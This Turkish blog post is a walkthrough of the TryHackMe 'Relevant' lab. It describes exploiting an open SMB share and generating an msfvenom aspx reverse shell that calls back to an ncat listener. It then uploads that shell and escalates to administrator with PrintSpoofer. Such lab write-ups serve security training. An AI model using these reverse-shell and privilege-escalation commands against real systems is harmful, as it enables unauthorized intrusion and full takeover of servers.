Bu yazımda Tryhackme Relevant Çözümü paylaştım.
- Makine İsmi: Relevant
- Zorluk: Orta
- Makine Linki: Tryhackme
1- Nmap ile portları ve versiyonları tespit ederek başlıyorum.
Dikkatimi çeken Microsoft eski serverların kullanılması zafiyet barındırabilir, diğer husus olarak Netbios üzerinden de devam edebiliriz.
2- smbclient -L Hedef sunucu ip adresi
Smb paylaşılanlara bakıyorum ve nt4wrksv olarak bize açık disk gösteriyor. Üzerine gidebiliriz.
Gobuster ve nikto taradığımda da işe yarar bilgi elde edemedim.
3-smbclient -U nt4wrksv \\\hedefsunucuipadresi\nt4wrksv içerisine geçiş yapıyoruz.
Baktığımızda password.txt olarak bize şifreleri veriyor. Makinemize indirerek incelemeye başlıyorum.
İlginizi çekebilecek yazımız: Tryhackme Oh My WebServer Çözümü
4- Şifrelere baktığımda base64 olarak şifrelendiğini tespit ettim.
Tek tek kırmaya başlıyorum.
5- Sıra sıra şifreleri çözdüm, bize Bob ve Bill kullanıcısının şifresini verdi. Bunu aklımızda tutalım makineyi inceleme devam ediyorum.
6- İkinci adımda smbclient olarak içerisine girmiştik, backdoor shell oluşturup sunucu içerisine yükleyerek yetki yükseltebileceğimizi fark ettim.
Şimdi meterpreter ile shell oluşturduk ve direkt makine içerisine geçiş yapmamıza imkan sağlayacak.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=localvpn adresi LPORT=9001 -f aspx >backdoor.aspx
7- ncat -lvnp 9001 yazarak 9001 port üzerinden gelecek bağlantıları bekleme aldık.
8- Tekrardan smbclient içerisine geldik.
put backdoor.aspx yazarak direkt olarak karşı makineye yüklemiş olduk.
9- Hedefmakineipadresi:49663/nt4wrksv/backdoor.aspx olarak enter yapıyoruz.
Direkt bağlantı terminalemize gelecektir buradan kendi terminalimize geri bağlantı almış olduk.
10 – Bağlantı geldi, artık makinenin içerisindeyiz devam ederek ilk bayrağı araştırıyorum.
Bob kullanıcısının içerisinde olma ihtimali bir hayli yüksek.
11- Bob kullanıcısının içerisine geçiş yaptım. Evet ilk bayrağı tespit ettim, artık yetki yükseltme aşamasına geçebiliriz.
Windows olduğu için listeleme için dir komutunu kullanabilirsiniz.
Bayrağı okumak için type olarak yazabilirsiniz.
12- Dikkatli incelediğimde SeImpersonatePrivilege olarak yetki yükseltme enabled yani izin verilmiş gözüküyor.
Araştırma yaptığımda Github içerisinde ki bir araç ile direkt yetki yükseltme yapabileceğimizi farkettim, bu araç direkt olarak bizi administrator içerisine geçirecek ve tam yetki sahibi olacağız.
13- Windows server 2016,2019 gibi eski ve yeni sunucularda yetki yükseltmede kullanıldığını tespit ettim.
Bizim sunucumuz ile benzer olduğu için yetki yükseltmede avantajlıyız.
https://github.com/dievus/printspoofer
14- Tekrar smbclient içerisine geldim;
put PrintSpoofer.exe yazarak yükledim. Başarı ile yüklendi, makine içerisine dönerek yetki yükseltme işlemine başlayabiliriz.
15-cd c:\inetpub\wwwroot\nt4wrksv içerisine geçiş yaptım. Yüklediğimiz tüm araçlar içerisinde bulunuyor.
PrintSpoofer.exe -i -c cmd yazdım ve onayladım.
Artık tam yetkili kullanıcı olarak makine içerisindeyiz.
16- type c:\users\administrator\desktop\root.txt yazarak root bayrağını da bulmuş olduk.
Tryhackme Relevant Çözümü sonuna geldik. Yeni yazılarda görüşmek üzere..